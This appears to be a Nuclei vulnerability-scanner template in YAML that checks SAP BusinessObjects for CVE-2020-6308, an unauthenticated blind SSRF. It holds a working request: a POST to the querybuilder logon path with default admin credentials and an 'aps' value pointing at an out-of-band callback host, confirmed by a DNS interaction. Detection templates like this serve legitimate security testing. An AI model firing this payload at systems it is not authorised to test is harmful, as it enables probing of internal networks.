22 lines
572 B
YAML
22 lines
572 B
YAML
id: CVE-2020-6308
|
|
|
|
info:
|
|
name: Unauthenticated Blind SSRF in SAP
|
|
author: madrobot
|
|
severity: medium
|
|
reference: https://github.com/InitRoot/CVE-2020-6308-PoC
|
|
tags: cve,cve2020,sap,ssrf,oob
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
|
|
|
|
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|